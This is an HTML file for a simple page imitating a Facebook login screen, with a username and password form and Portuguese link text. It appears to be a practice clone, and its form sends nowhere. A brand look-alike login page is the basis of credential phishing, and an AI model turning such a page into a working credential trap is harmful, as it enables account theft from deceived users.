<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook - Login</title>
</head>
<style>
    .container {
    width: 100vw;
    height: 100vh;
    background: #f2f4f7;
    display: flex;
    flex-direction: row;
    justify-content: center;
    align-items: center;
    }
    .box {
    width: 300px;
    height: 300px;
    background: #fff;
    padding-top: 1rem;
    padding-left: 1rem;
    padding-right: 1rem;
    padding-bottom: 1rem;
    
    }
    body {
    margin: 0px;
    }

    input {
        background-color: f2f4f7;
        color: black;
        padding: 0.5rem;
        margin-top: 0.5rem;
        width: 99%;
    }

    h3{
        justify-self: center;
        color: blue
    }

    h5 {
        justify-self: center;
    }

</style>
<body>
    <div class="container">
        <div class="box">
            <h3>Facebook</h3>
            <hr>

            <h5>Login</h5>
            <form action="">
                <div style="text-align: center">
                    <input type="text" id="username" value="" name="username" placeholder="Username">
                    <input type="password" id="password" name="password" placeholder="Password">
                    <input type="submit" value="Login" style="background-color: dodgerblue; color: white; width: 100%; border: none; border-radius: rounded;">
                </div>
                 <div>
                    <a href="#">Esqueci a senha</a>
                    <a href="#">Sou novo</a>
                </div>
            </form>
        </div>
    </div>

    <img src="imageas.jpeg" alt="">
</body>
</html>